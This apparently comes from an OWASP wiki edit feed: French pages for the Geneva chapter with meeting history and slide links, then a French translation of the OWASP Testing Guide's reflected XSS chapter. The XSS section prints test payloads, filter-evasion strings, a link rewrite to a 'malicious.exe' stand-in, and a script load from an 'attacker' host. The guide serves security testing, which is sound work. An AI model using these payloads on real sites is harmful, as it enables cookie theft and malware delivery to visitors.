* A. Fontes - Introduction and keynote ([http://www.owasp.org/images/3/38/0_OWASP-geneva-Spring-09-FONTES.pptx Office 2007], [http://www.owasp.org/images/8/8b/0_OWASP-geneva-Spring-09-FONTES.ppt Office 2003], [http://www.owasp.org/index.php/Image:0_OWASP-geneva-Spring-09-FONTES.pdf PDF]) (in French)<br />
* S. Gioria - The OWASP Top 10 ([http://www.owasp.org/images/d/de/1_OWASP-geneva-Spring-09-GIORIA.ppt Office 2003], [http://www.owasp.org/index.php/Image:1_OWASP-geneva-Spring-09-GIORIA.pdf PDF]) (in French)<br />
* G.K. Agopome - Merging security into the SDLC: from theory to practice ([http://www.owasp.org/images/d/da/2_OWASP-geneva-Spring-09-AGOPOME.ppt Office 2003], [http://www.owasp.org/index.php/Image:2_OWASP-geneva-Spring-09-AGOPOME.pdf PDF]) (in French)<br />
<headertabs></headertabs><br />
<br />
<paypal>Geneva (Switzerland) Chapter</paypal><br />
<br />
{| cellspacing="15"<br />
|-<br />
| [[Image:Mailinglist_button.png|62px|link=https://lists.owasp.org/mailman/listinfo/owasp-geneva]] <br />
| [[Image:Twitter_button.png|62px|link=https://twitter.com/OWASP_Geneva]]<br />
| [[Image:Facebook_button.png|62px|link=https://www.facebook.com/OWASPSwitzerland]]<br />
|}<br />
<br />
[[Category:OWASP_Chapter]] <br />
[[Category:Switzerland]] <br />
[[Category:Europe]]</div>Thoferhttps://wiki.owasp.org/index.php?title=Geneva&diff=229135Geneva2017-04-25T10:09:21Z<p>Thofer: added april 7th 2017 meeting</p>
<hr />
<div>__NOTOC__ <br />
<br />
'''If you are looking for information on nationwide OWASP Switzerland chapter activities and meetings held in the German-speaking area, please follow this link to the [https://www.owasp.org/index.php/Switzerland OWASP Switzerland chapter].'''<br />
<br><br><br />
= Bienvenue =<br />
[[File:Owasp_switzerland_geneva_logo.png|150px|right|OWASP Switzerland Chapter Logo]]<br />
<br />
Bienvenue sur la page d'accueil de la section locale OWASP Geneva!<br />
* Pour vous inscrire à la liste de diffusion: [http://lists.owasp.org/mailman/listinfo/owasp-geneva OWASP Geneva mailing list]<br />
* Pour nous suivre sur Twitter: [https://twitter.com/OWASP_Geneva @OWASP_Geneva]<br />
<!--* Pour consulter le programme du prochain meeting (25 juin 2013) et vous inscrire: [http://owaspeutourgeneva.eventbrite.com owaspeutourgeneva.eventbrite.com]--><br />
<br />
<br> Pour consulter le site de la section nationale: '''[[Switzerland|OWASP Switzerland chapter]]'''<br />
<br><br />
<br><br />
<br />
= Agenda des meetings =<br />
Les meetings ont lieu sur une base trimestrielle et se déroulent généralement dans une salle mise à disposition par un sponsor ou par l'un des partenaires académiques/institutionnels de la section. Dès décembre 2012, les meetings se tiennent en itinérance dans deux villes de Suisse romande. L'organisation et le détail des meetings est communiqué via la [http://lists.owasp.org/mailman/listinfo/owasp-geneva liste de diffusion] et via le [https://twitter.com/OWASP_Geneva compte Twitter de la section].<br />
<br />
'''PROCHAIN MEETING : 7 Avril 2017'''<br><br />
Lieu: Genève -<br /><br />
Inscription: lien publié prochainement (s'inscrire à la liste de diffusion ou au flux Twitter)<br /><br />
Sponsors/Remerciements: -<br /><br />
Thème: -<br /><br />
<br><br />
<br />
= Newsletter et contact =<br />
Par email:<br>[mailto:antonio.fontes@owasp.org OWASP Geneva]<br><br><br />
Par la liste de diffusion:<br>[http://lists.owasp.org/mailman/listinfo/owasp-geneva OWASP Geneva Mailing List]<br><br><br />
Par Twitter:<br>[https://twitter.com/OWASP_Geneva @OWASP_Geneva]<br />
<br><br />
<br />
<br />
= Participation =<br />
Les meetings OWASP sont ouverts à tous et gratuits. Nous encourageons l'échange informel sur tous sujets relatifs à la sécurité applicative. Toute personne intéressée par la sécurité applicative est la bienvenue aux meetings!<br />
<br />
<br> Les sujets principalement abordés sont:<br />
<br />
*Analyse et conception d'applications sécurisées<br />
*Techniques et méthodes de développement sécurisé<br />
*Évaluation et validation de la sécurité des applications (tests d'intrusion, recherche de vulnérabilités)<br />
*Sécurité d'architectures et technologies de développement logiciel<br />
*Gouvernance de la sécurité logicielle dans les organisations<br />
<br><br />
<br />
'''Vous souhaitez présenter lors d'un meeting?'''<br><br />
Si vous souhaitez présenter un sujet lors d'un prochain meeting OWASP ou avez une question relative aux meetings de la section OWASP Geneva, n'hésitez pas à envoyer un email au [mailto:geneva@owasp.ch comité]. Toute intervention orale (présentation, formation) lors d'un meeting OWASP est soumise à l'acceptation préalable du [https://www.owasp.org/index.php/Speaker_Agreement règlement des conférenciers].<br />
<br><br />
<br />
= Sponsoring =<br />
Quatre formules de sponsoring sont actuellement proposées aux organisations désireuses de soutenir la mission de l'OWASP:<br />
* Chapter Supporter: soutien financier annuel de la section OWASP Geneva<br />
* Single Meeting Supporter: soutien financier ponctuel, pour un meeting spécifique de la section OWASP Geneva <br />
* Facility Sponsor: mise à disposition de salles équipées pour la tenue des meetings OWASP Geneva<br />
* Organization Supporter: soutien financier annuel de la fondation OWASP + 40% de la cotisation reversés à la section affiliée (OWASP Geneva)<br />
<br />
Pour toute information relative au sponsoring affilié à la section, merci de contacter le [mailto:geneva@owasp.ch Comité] ou consulter la page [https://www.owasp.org/index.php/Membership memberships] dédiée à cet effet.<br />
<br><br />
<br />
= Organigramme =<br />
La Section OWASP Geneva est organisée sous la forme d'un Comité (OWASP Geneva Chapter Board) en charge de la gestion de la section et de ses activités. Le Comité est composé de:<br />
* [mailto:antonio.fontes@owasp.org Antonio Fontes] (''chapter leader'')<br />
* [mailto:thomas.hofer@owasp.org Thomas Hofer] (''board member'')<br />
* Vous pouvez [mailto:geneva@owasp.ch cliquer ici] pour joindre le Comité via une seule adresse <br />
<br><br />
<br />
= Historique =<br />
'''Lundi 7 avril 2017 / Monday April 7th 2017''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève<br /><br />
Conference/Talk 1: Julien Bachmann - "Retour sur une décennie de tests d'intrusion: comment améliorer la détection?"<br /><br />
Conference/Talk 2: Thomas Hofer - " Le vote électronique à Genève: dernières évolutions" ([https://www.owasp.org/images/7/75/CHvote_%E2%80%93_towards_2.0.pdf slides])<br /><br />
<br />
'''Lundi 12 décembre 2016 / Monday December 12th 2016''' | Local Chapter meeting<br /><br />
Lieu/Location: Genève<br /><br />
Conference/Talk 1: Jérémy Matos - "OWASP Mobile Application Security Verification Standard (MASVS)" ([https://www.owasp.org/index.php/File:OWASP_Geneva-Chapter_Meeting-20161212_Jeremy_Matos-MASVS.pdf slides])<br /><br />
Conference/Talk 2: Cédric Jeanneret - "Compromission d'un serveur web: le point de vue du sysadmin" ([https://www.owasp.org/index.php/File:OWASP_Geneva-Chapter_Meeting-20161212_Cedric_Jeanneret-Serveurs_web_vu_du_sysadmin.pdf slides (Latex export)] [https://github.com/EthACKdotOrg/Presentations/tree/master/20161212 source] )<br /><br />
<br />
<br />
'''Lundi 16 novembre 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Julien Bachmann - "Elasticsearch: incident detection use-cases and security best practices" ([https://speakerdeck.com/milkmix/elasticsearch-incident-detection-use-cases-and-security-best-practices slides])<br /><br />
<br />
<br />
'''Lundi 19 octobre 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Flash talk: Antonio Fontes - "OWASP Software Assurance Maturity Model" ([https://www.owasp.org/images/5/51/OWASP_Geneva-20151019-Antonio_Fontes-SAMM.pdf slides])<br /><br />
Flash talk: Thomas Hofer - "OWASP Dependency Check" ([https://www.owasp.org/images/9/92/OWASP_Geneva-20151019-Thomas_Hofer-Dependency_Check.pdf slides])<br /><br />
Flash talk: Antonio Fontes - "OWASP Application Security Verification Standard" ([https://www.owasp.org/images/0/02/OWASP_Geneva-20151019-Antonio_Fontes-ASVS.pdf slides])<br /><br />
([https://www.owasp.org/images/c/cc/OWASP_Geneva-20151019-Meeting_Slides_Deck.zip powerpoint decks archive])<br /><br />
<br />
<br />
'''Lundi 2 mars 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Alain Sullam - "Analyse de code malveillant avec Cuckoo sandbox" ([https://www.owasp.org/index.php/File:OWASP_Geneva-2015_03_02-Alain_Sullam-CUCKOO.pdf slides])<br /><br />
<br />
'''Lundi 19 janvier 2015''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Thème: soirée bar-talk / actualité et débats appsec <br /><br />
<br />
'''Lundi 15 décembre 2014''' | Local Chapter meeting<br /><br />
Lieu: Genève<br /><br />
Conférence: Stéphane Adamiste - "Modélisation des menaces: Comment gérer les aspects de sécurité dans les projets" ([https://www.owasp.org/index.php/File:1c_ThreatModelling_F.pptx slides])<br /><br />
<br />
'''Mercredi 25 juin 2013''' | OWASP European Chapters Tour 2013<br /><br />
Lieu: Genève<br /><br />
Conférence: Sebastien Deleersnyder - "Open SAMM"([https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx slides])<br /><br />
<br />
'''Mardi 7 Mai 2013''' | Local Chapter meeting<br><br />
Lieu: Genève<br /><br />
Conférence: Simon Blanchet - "Gouvernance de la sécurité logicielle, le modèle BSIMM 4"([https://owasp.org/images/e/e7/OWASP_Geneva-2013_05_07-Simon_Blanchet-BSIMM4.pptx slides])<br /><br />
<br />
'''5 et 6 décembre 2012''' | Local Chapter Meeting<br><br />
Lieux: Genève (6 décembre), Yverdon-les-Bains (5 décembre)<br><br />
[http://lists.owasp.org/pipermail/owasp-geneva/2012-November/000039.html informations] | [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf slides]<br />
<br />
'''13. December 2011''' | Local Chapter Meeting<br> All information about the meeting can be found [https://lists.owasp.org/pipermail/owasp-switzerland/2011-December/000223.html here]<br />
<br />
'''13. Mai 2011''' | Swiss Cyber Storm III<br><br />
Les sections OWASP Suisse et Genève présenteront l'OWASP lors du SCS3. <br />
<br />
'''17. Février 2011''' | Local ChaptervMeeting<br><br />
Lieu: Yverdon-Les-Bains. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''23. Mars 2010''' | Local ChaptervMeeting<br><br />
Lieu: Application Security Forum, à Genève. [http://owasp.ch/geneva/owasp-communique-meeting-201102.pdf informations] | [https://spreadsheets.google.com/a/owasp.org/viewform?hl=en&formkey=dGtYelV6X0NzZXRDV2pSbVBrX2xyUHc6MQ#gid=3 inscriptions]<br><br />
Slides de présentation: [[Geneva_February_2011_Meeting|OWASP Geneva Meeting February 2011]].<br />
<br />
'''22. Janvier 2010''' | Challenge Insomni'hack<br><br />
La section OWASP Geneva tiendra un desk d'informations lors du prochain challenge Insomni'hack 2010'''. N'hésitez pas à venir nous rendre visite et découvrir les activités et projets de l'OWASP! [http://www.scrt.ch/pages/concours10.html informations]'''<br />
<br />
'''25. Avril 2009 | Local Chapter Meeting'''<br /><br />
Résultats des sondages: [http://www.surveymonkey.com/s.aspx?sm=4Uj8sRJAAWEhZStomAIUfg_3d_3d survey]<br><br />
Slides de présentations: [[Geneva_Spring_2009_Meeting|Geneva Spring 09 meeting]].<br><br />
<br />
<br><br />
<br />
= Supports = <br />
'''Juin 2013 - OWASP Meeting - Europe Chapters Tour'''<br />
* S. Deleersnyder - [https://www.owasp.org/index.php/File:OpenSAMM_-_AppSecEU_2014_talk_seba_-_bart_v_Final.pptx OWASSP OpenSAMM]<br />
<br />
'''Décembre 2012 - OWASP Meeting Genève et Yverdon-les-Bains'''<br />
* S. Maret - [https://www.owasp.org/images/9/90/OWASP_Geneva-Sylvain_Maret-Web_services_security_REST_vs_SOAP.pdf Services web SOAP et REST: quelles opportunités pour la sécurité?]<br />
<br />
'''Mai 2011 - Swiss Cyber Storm (Rapperswil)'''<br />
* A. Fontes - [https://www.owasp.org/index.php/File:SwissCyberStorm3-Do_you_know_OWASP.pdf About the OWASP].<br />
<br />
'''Février 2011 meeting (Feb 11th. 2011, Yverdon-les-Bains)'''<br />
* A. Fontes - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-keynote.pptx Keynote] (in French)<br />
* S. Andrivet/F.Bottaccio - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-0days.pptx 0-days: le diable se cache dans les plug-ins] (in French)<br />
* T. Hofer - [http://www.owasp.org/index.php/File:OWASP-Geneva-201102-TrouvezVosBugsLePremier.pptx Code source - Soyez le premier à trouver vos failles de sécurité!] (in French)<br />
<br />
'''Spring 2010 meeting (March 4th. 2010, Geneva)'''<br />
* A. Fontes - Keynote ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* S. Maret - Integrating strong authentication in web applications (in French) ([http://www.scribd.com/doc/28230164/Geneva-Application-Security-Forum-2010-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
* P. Leothaud - Security considerations on strong authentication: analysis of the ASVS (in French) ([http://www.scribd.com/doc/28230739/Geneva-Application-Security-Forum online])<br />
* R. Ott - Digital identities federation and OpenID (in English) ([http://www.scribd.com/doc/28229887/Geneva-Application-Security-Forum-Vers-une-authentification-plus-forte-dans-les-applications-web online])<br />
<br />
'''Spring 2009 meeting (April 23rd. 2009, Geneva)'''<br />
* A. Fontes - Introduction and keynote ([http://www.owasp.org/images/3/38/0_OWASP-geneva-Spring-09-FONTES.pptx Office 2007], [http://www.owasp.org/images/8/8b/0_OWASP-geneva-Spring-09-FONTES.ppt Office 2003], [http://www.owasp.org/index.php/Image:0_OWASP-geneva-Spring-09-FONTES.pdf PDF]) (in French)<br />
* S. Gioria - The OWASP Top 10 ([http://www.owasp.org/images/d/de/1_OWASP-geneva-Spring-09-GIORIA.ppt Office 2003], [http://www.owasp.org/index.php/Image:1_OWASP-geneva-Spring-09-GIORIA.pdf PDF]) (in French)<br />
* G.K. Agopome - Merging security into the SDLC: from theory to practice ([http://www.owasp.org/images/d/da/2_OWASP-geneva-Spring-09-AGOPOME.ppt Office 2003], [http://www.owasp.org/index.php/Image:2_OWASP-geneva-Spring-09-AGOPOME.pdf PDF]) (in French)<br />
<headertabs></headertabs><br />
<br />
<paypal>Geneva (Switzerland) Chapter</paypal><br />
<br />
{| cellspacing="15"<br />
|-<br />
| [[Image:Mailinglist_button.png|62px|link=https://lists.owasp.org/mailman/listinfo/owasp-geneva]] <br />
| [[Image:Twitter_button.png|62px|link=https://twitter.com/OWASP_Geneva]]<br />
| [[Image:Facebook_button.png|62px|link=https://www.facebook.com/OWASPSwitzerland]]<br />
|}<br />
<br />
[[Category:OWASP_Chapter]] <br />
[[Category:Switzerland]] <br />
[[Category:Europe]]</div>Thoferhttps://wiki.owasp.org/index.php?title=File:CHvote_%E2%80%93_towards_2.0.pdf&diff=229134File:CHvote – towards 2.0.pdf2017-04-25T10:04:03Z<p>Thofer: </p>
<hr />
<div>Slide deck for the presentation of the evolution of the internet voting system of Canton Geneva (CHvote)</div>Thoferhttps://wiki.owasp.org/index.php?title=File:Secure-it_20170217_WebGoat.pptx&diff=226649File:Secure-it 20170217 WebGoat.pptx2017-02-23T13:09:35Z<p>Thofer: Talk given at the first Secure-IT conference in Sierre, Valais. February 17th 2017</p>
<hr />
<div>Talk given at the first Secure-IT conference in Sierre, Valais. February 17th 2017</div>Thoferhttps://wiki.owasp.org/index.php?title=4.8.1_Test_de_Reflected_Cross-Site_Scripting_(OTG-INPVAL-001)&diff=1922994.8.1 Test de Reflected Cross-Site Scripting (OTG-INPVAL-001)2015-03-27T09:36:01Z<p>Thofer: </p>
<hr />
<div>{{Template:OWASP Testing Guide v4}}<br />
<br />
== Sommaire ==<br />
<br />
Les attaques Reflected [[Cross-site Scripting (XSS)]] ont lieu quand un attaquant injecte du code exécutable par le navigateur dans une seule réponse HTTP. L'attaque injectée n'est pas stockée par l'application elle-même ; elle est non-persistante et n'impacte que les utilisateurs qui ouvrent un lien malicieux ou une page web tierce. La chaîne d'attaque est incluse dans l'URI ou les paramètres HTTP, est mal interprêtée par l'application, puis renvoyée à la victime.<br />
<br />
<br />
Les Reflected XSS sont le type d'attaques XSS que l'on trouve le plus fréquemment. Elles sont aussi connues sous le nom d'attaques non-persistantes, puisque la charge utile de l'attaque est envoyée et exécutée par une simple requête/réponse. Elles sont aussi appelées attaque XSS de premier ordre ou de type 1.<br />
<br />
<br />
Quand une application est vulnérable à ce type d'attaque, elle va passer des entrées non-validées de requêtes à un client. Le modus operandi classique inclut une étape de design, lors de laquelle l'attaquant crée et teste une URI hostile, puis une étape d'ingénierie sociale lors de laquelle l'attaquant convainc ses victimes de charger cette URI dans leur navigateur, et enfin l'exécution du code par le navigateur de la victime.<br />
<br />
<br />
Généralement le code de l'attaquant est écrit en JavaScript, mais d'autres langages peuvent être utilisés, par exemple ActionScript et VBScript. Les attaquants utilisent ces vulnérabilités pour installer des key loggers, voler les cookies des victimes, voler le contenu du presse-papier ou encore changer le contenu d'une page (par exemple les liens de téléchargement).<br />
<br />
<br />
Une des principales difficultés pour prévenir les vulnérabilités XSS vient de l'encodage des caractères. Dans certains cas, les serveurs web ou les application web ne peuvent pas filtrer certains encodages, par exemple l'application web va filtrer "<script>" mais peut-être pas %3cscript%3e, qui encode différemment les marqueurs.<br />
<br />
==Comment tester==<br />
=== Test en boite noire ===<br />
Un test en boite noire va comprendre au moins trois phases :<br />
<br />
1. Détecter les vecteurs d'entrée. Pour chaque page web, le testeur doit déterminer toutes les variables utilisateur définies par l'application et comment les entrer. Cela inclut les entrées cachées et non évidentes, comme les paramètres HTTP, les données POST, les champs cachés dans les formulaires, et les valeurs prédéfinies de radio et sélections. Typiquement, les éditeurs HTML des navigateurs ou des proxies web seront utilisés pour visualiser ces variables cachées. Voir les exemples ci-dessous.<br />
<br />
<br />
2. Analyser chaque vecteur d'entrée pour détecter des vulnérabilités potentielles. Pour détecter une vulnérabilité XSS, le testeur utilise généralement des données d'entrée spécialement conçues pour chaque vecteur. De telles données d'entrée sont généralement inoffensives, mais déclenchent des réponses de la part du navigateur web qui mettent en évidence la vulnérabilité. Les données de test peuvent être générées grâce à un fuzzer d'application web, une liste prédéfinie de chaînes d'attaque automatisée ou manuellement. <br />Quelques exemples d'attaques :<br />
<pre><br />
<script>alert(123)</script><br />
</pre><br />
<pre><br />
“><script>alert(document.cookie)</script><br />
</pre><br />
Pour une liste complète des chaînes à tester, voir [[XSS Filter Evasion Cheat Sheet]].<br />
<br />
<br />
3. Pour chaque test de la phase précédente, le testeur va analyser le résultat et déterminer s'il représente une vulnérabilité ayant un impact réel sur la sécurité de l'application web. Cela implique d'examiner la page HTML résultante et d'y chercher l'entrée de test. Une fois trouvée, le testeur doit identifier les caractères spéciaux qui ne sont pas correctement encodés, remplacés ou filtrés. L'ensemble constitué par les caractères spéciaux non filtrés va dépendre du contexte de cette section HTML.<br />
<br />
Idéalement, tous les caractères spéciaux HTML vont être remplacés par des entités HTML. Les plus importants à identifier sont :<br />
<pre><br />
> (plus grand que) <br />
< (plus petit que) <br />
& (et commercial)<br />
' (apostrophe or simple quote)<br />
" (guillemets ou double quote)<br />
</pre><br />
<br />
<br />
Cependant, une liste complète est donnée dans les spécifications HTML et XML. Wikipedia en donne une référence complète [http://en.wikipedia.org/wiki/List_of_XML_and_HTML_character_entity_references].<br />
<br />
<br />
Dans un contexte d'action HTML ou de code JavaScript, un ensemble différent de caractères spéciaux doit être encodé, remplacé ou filtré. Cela inclut :<br />
<pre><br />
\n (nouvelle ligne)<br />
\r (retour chariot)<br />
\' (apostrophe ou simple quote)<br />
\" (guillemets ou double quote)<br />
\\ (backslash)<br />
\uXXXX (valeurs unicode)<br />
</pre><br />
<br />
<br />
Pour une référence plus complète, voir le guide JavaScript de Mozilla. [https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Values,_variables,_and_literals#Using_special_characters_in_strings]<br />
<br />
<br />
==== Exemple 1 ====<br />
Par exemple, considérons un site qui a une notice de bienvenue " Bienvenue %username% " et un lien de téléchargement.<br />
<br><br><br />
[[Image:XSS Example1.png]]<br />
<br><br><br />
Le testeur doit soupçonner que chaque point d'entrée de données peut servir à une attaque XSS. Pour l'analyser, il va jouer avec la variable utilisateur et essayer de déclencher la vulnérabilité.<br />
<br />
<br />
Cliquons sur le lien suivant et voyons ce qui se passe :<br />
<pre>http://example.com/index.php?user=<script>alert(123)</script></pre><br />
<br />
<br />
Si aucun nettoyage n'est fait, la popup suivante va s'afficher :<br />
<br><br><br />
[[Image:alert.png]]<br />
<br><br><br />
Cela indique qu'il y a une vulnérabilité XSS et que le testeur peut exécuter du code de son choix dans le navigateur de quiconque cliquera sur le lien du testeur.<br />
<br />
<br />
==== Exemple 2 ====<br />
Essayons un autre morceau de code (link) :<br />
<pre>http://example.com/index.php?user=<script>window.onload = function() {var AllLinks=document.getElementsByTagName("a"); <br />
AllLinks[0].href = "http://badexample.com/malicious.exe"; }</script> </pre><br />
<br />
<br />
Cela produit le comportement suivant :<br />
<br><br><br />
[[Image:XSS Example2.png]]<br />
<br><br><br />
L'utilisateur cliquant sur le lien fournit par le testeur va télécharger le fichier malicious.exe depuis le site sous contrôle.<br />
<br />
<br />
=== Contourner les filtres XSS ===<br />
La prévention des reflected cross-site scripting passe par la validation des entrées par l'application web, le blocage des entrées malicieuses par un firewall applicatif, ou par des mécanismes inclus dans les navigateurs modernes. Le testeur doit considérer que le navigateur n'empêchera pas l'attaque. Les navigateurs peuvent être obsolètes, ou avoir leurs fonctions de sécurité désactivées. De même, les firewalls applicatifs n'offrent aucune garantie pour les attaques nouvelles et inconnues. Un attaquant peut concevoir une chaîne d'attaque qui ne sera pas reconnue par le firewall applicatif.<br />
<br />
<br />
Ainsi, la plus grande part de la prévention des XSS dépend de la validation des entrées utilisateur. Il y a divers mécanismes à disposition des développeurs, comme le renvoi d'erreur, la suppression, l'encodage ou le remplacement des entrées invalides. Les moyens par lesquels l'application détecte et corrige les entrées invalides sont aussi une des principales faiblesses pour la prévention des XSS. Une liste noire ne comprendra pas toutes les chaînes d'attaque possibles, une liste blanche peut être trop permissive, la correction pourrait échouer, ou une type d'entrée pourrait être incorrectement accepté et rester sans correction. Tout cela peut permettre aux attaquants de contourner les filtres XSS.<br />
<br />
<br />
La [[XSS Filter Evasion Cheat Sheet]] documente les tests d'évasion.<br />
<br />
<br />
==== Exemple 3: Valeur d'attribut de marqueur ====<br />
<br><br />
Ces filtres sont basés sur une liste noire, ils ne peuvent donc pas bloquer tous les types d'expressions. En fait, il y a des cas où un exploit XSS peut être utilisé sans usage du marqueur <script> et même sans les caractères comme " < > et / qui sont communément filtrés.<br />
<br />
<br />
Par exemple, l'application web peut utiliser l'entrée utilisateur pour renseigner un attribut, comme montré ici :<br />
<pre><br />
<input type="text" name="state" value="INPUT_FROM_USER"><br />
</pre><br />
<br />
<br />
Alors un attaquant peut soumettre le code suivant ;<br />
<pre><br />
" onfocus="alert(document.cookie)<br />
</pre><br />
<br />
<br />
==== Exemple 4: syntaxe ou encodage différent ====<br />
<br><br />
Dans certains cas, il est possible que les filtres basés sur des signatures soient trompés en masquant une attaque, typiquement en insérant des variations inattendues dans la syntaxe ou l'encodage. Ces variations sont tolérées par les navigateurs comme du code HTML valide lorsqu'elles sont retournées, et pourtant elles sont aussi acceptées par le filtre.<br />
<br />
<br />
Quelques exemples:<br />
<pre><br />
"><script >alert(document.cookie)</script ><br />
</pre><br />
<br />
<pre><br />
"><ScRiPt>alert(document.cookie)</ScRiPt><br />
</pre><br />
<br />
<pre><br />
"%3cscript%3ealert(document.cookie)%3c/script%3e<br />
</pre><br />
<br />
<br />
==== Exemple 5: Contourner le filtrage non-récursif ====<br />
<br><br />
Parfois, le nettoyage n'est appliqué qu'une fois, au lieu de l'être récursivement. Dans ce cas, l'attaquant peut vaincre le filtre en envoyant une chaîne contenant de multiples tentatives, telle que :<br />
<pre><br />
<scr<script>ipt>alert(document.cookie)</script><br />
</pre><br />
<br />
<br />
==== Exemple 6: Inclure un script externe ====<br />
<br><br />
Supposons maintenant que les développeurs du site cible ont implémenté le code suivant, pour protéger les entrées contre l'inclusion de script externe :<br />
<pre><br />
<?<br />
$re = "/<script[^>]+src/i";<br />
<br />
if (preg_match($re, $_GET['var'])) <br />
{<br />
echo "Filtered";<br />
return; <br />
}<br />
echo "Welcome ".$_GET['var']." !";<br />
?><br />
</pre><br />
<br />
<br />
Dans ce scénario, il y a une expression rationnelle qui vérifie si <b><script [caractère quelconque sauf: '>' ] src</b> est insérée. Cela fonctionne pour filtrer des expressions telles que<br />
<pre><br />
<script src="http://attacker/xss.js"></script><br />
</pre><br />
<br />
qui est une attaque commune. Mais dans ce cas, il est possible de contourner la validation en utilisant le caractère ">" dans un attribut entre script et src, comme cela :<br />
<pre><br />
http://example/?var=<SCRIPT%20a=">"%20SRC="http://attacker/xss.js"></SCRIPT> <br />
</pre><br />
<br />
<br />
Cela va exploiter la faille cross-site scripting montrée plus haut, en exécutant le code JavaScript stocké sur le serveur web de l'attaquant, comme s'il venait du site web victime, http://example/.<br />
<br />
<br />
==== Exemple 7: Pollution des paramètres HTTP (HPP) ====<br />
<br><br />
La pollution de paramètres HTTP est une autre méthode de contournement des filtres. Cette technique a été présentée par Stefano di Paola et Luca Carettoni en 2009 à la conférence OWASP de Pologne. Pour plus d'informations : [[Testing for HTTP Parameter pollution (OTG-INPVAL-004)|Testing for HTTP Parameter pollution]]. Cette technique d'évasion consiste en divisant un vecteur d'attaque en plusieurs paramètres de même nom. La manipulation de la valeur de chaque paramètre dépend de chaque technologue web utilisée pour les parser, ce type d'évasion n'est donc pas toujours possible. Si l'environnement testé concatène les valeurs de tous les paramètres de même nom, alors un attaquant peut utiliser cette technique pour contourner les mécanismes de sécurités basés sur la reconnaissance de motifs.<br />
<br><br />
<br />
Attaque classique :<br />
<pre><br />
http://example/page.php?param=<script>[...]</script><br />
</pre><br />
Attaque HPP:<br />
<pre><br />
http://example/page.php?param=<script&param=>[...]</&param=script><br />
</pre><br />
<br />
<br />
''' Résultat attendu '''<br />
<br><br />
Pour une liste plus détaillée des techniques d'évasion de filtrage : [[XSS Filter Evasion Cheat Sheet]]. L'analyse des réponses peut devenir complexe. Une méthode simple peut être d'utiliser du code qui génère un dialogue popup, comme dans notre exemple. Cela indique typiquement qu'un attaquant peut exécuter du code JavaScript arbitraire dans le navigateur des visiteurs.<br />
<br />
<br />
=== Test en boite grise ===<br />
Le teste en boite grise sera similaire au test en boite noire. En boite grise, le testeur un connaissance partielle de l'application. Dans ce cas, les informations concernant les entrées utilisateur, le contrôle des entrées, et la manière dont les entrées utilisateur sont renvoyées peuvent être connues par le testeur.<br />
<br />
<br />
Si le code source est disponible (boite blanche), toutes les variables reçues des utilisateurs doivent être analysées. Le testeur doit en outre analyser toute les procédures de validation implémentées pour déterminer celles qui sont contournables.<br />
<br />
==Outils==<br />
* '''[[OWASP CAL9000 Project|OWASP CAL9000]]''' <br />
CAL9000 est une collection d'outils de test de sécurité pour les application web qui complète les proxies et scanner automatiques. Il est disponible ici : http://yehg.net/lab/pr0js/pentest/CAL9000/ .<br />
* '''PHP Charset Encoder(PCE)''' - http://h4k.in/encoding [mirror: http://yehg.net/e ]<br />
Cet outil permet d'encoder et de décoder des textes dans 65 types de caractères. Il fournit aussi quelques fonction d'encodage JavaScript.<br />
* '''HackVertor''' - http://www.businessinfo.co.uk/labs/hackvertor/hackvertor.php<br />
Cet outil fournit des douzaines d'encodages flexibles pour des manipulations avancées de chaînes d'attaques.<br />
* '''[[OWASP WebScarab Project|WebScarab]]'''<br />
WebScarab est un framework pour l'analyse d'applications HTTP/HTTPS.<br />
* '''XSS-Proxy''' - http://xss-proxy.sourceforge.net/<br />
XSS-Proxy est un outil avancé d'attaque XSS<br />
* '''ratproxy''' - http://code.google.com/p/ratproxy/<br />
Outil semi-automatisé, essentiellement passif d'audit de sécurité web. Il est optimisé pour une détection précise et une annotation automatique des problèmes potentiels, se basant sur des design patterns observés dans le trafic utilisateur des environnements web 2.0.<br />
* '''Burp Proxy''' - http://portswigger.net/proxy/<br />
Burp Proxy est un proxy HTTP/S interactif pour l'attaque et le test d'applications web.<br />
* '''OWASP Zed Attack Proxy (ZAP)''' - [[OWASP_Zed_Attack_Proxy_Project]]<br />
ZAP est un outil de test d'intrusion intégré pour trouver des vulnérabilités dans les applications web. Il est conçu pour être utilisé par des personnes ayant une large expérience en sécurité, et est donc idéal pour les développeurs et testeurs fonctionnels débutants en matière de tests d'intrusion. ZAP fournit des scanners automatiques aussi bien qu'un ensemble d'outils pour la recherche manuelle.<br />
* '''OWASP Xenotix XSS Exploit Framework''' - [[OWASP_Xenotix_XSS_Exploit_Framework]]<br />
OWASP Xenotix XSS Exploit Framework est un framework avancé de détection et exploitation de faille XSS. Il fournit des résultats sans faux positifs grâce à son scanner triple navigateur (Trident, WebKit, Gecko). Il prétend inclure la 2nde plus grand base de charges utiles XSS du monde, pour une détection et un contournement des WAF efficaces. Son moteur de script permet de créer des cas de tests spécifiques et des ajouts via son API. Il inclut un module de reconnaissance très riche en fonctionnalités. Le framework d'exploitation inclut des modules XSS offsensifs pour les tests d'intrusion et la création de preuves de concept.<br />
<br />
<br />
== References ==<br />
'''OWASP Resources'''<br><br />
*[[XSS Filter Evasion Cheat Sheet]] <br />
'''Books'''<br><br />
* Joel Scambray, Mike Shema, Caleb Sima - "Hacking Exposed Web Applications", Second Edition, McGraw-Hill, 2006 - ISBN 0-07-226229-0<br />
